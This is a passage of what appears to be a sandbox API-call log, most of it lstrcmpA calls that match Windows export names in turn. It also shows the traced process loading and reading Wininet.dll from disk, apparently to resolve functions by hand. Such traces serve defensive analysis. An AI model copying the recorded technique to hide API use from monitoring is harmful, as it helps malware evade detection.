(lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0175.455] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0175.455] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0175.455] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0175.455] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0175.455] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0175.456] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0175.456] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0175.457] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.457] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0175.458] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0175.459] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0176.501] GetProcessHeap () returned 0x590000 [0176.642] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5f0 | out: hHeap=0x590000) returned 1 [0176.645] GetProcessHeap () returned 0x590000 [0176.645] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a9060 [0176.645] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0176.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0176.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0176.657] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0176.657] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0176.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0176.657] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0176.657] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0176.658] GetProcessHeap () returned 0x590000 [0176.658] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x286600) returned 0x40cc040 [0176.663] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0176.663] ReadFile (in: hFile=0x140, lpBuffer=0x40cc040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40cc040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0177.056] CloseHandle (hObject=0x140) returned 1 [0177.056] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0177.057] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0177.057] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0177.057] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0177.057] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.057] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0177.058] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0177.059] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0177.059] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0177.060] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.060] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0177.061] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0177.062] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0177.063] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0177.063] lstrcmpA 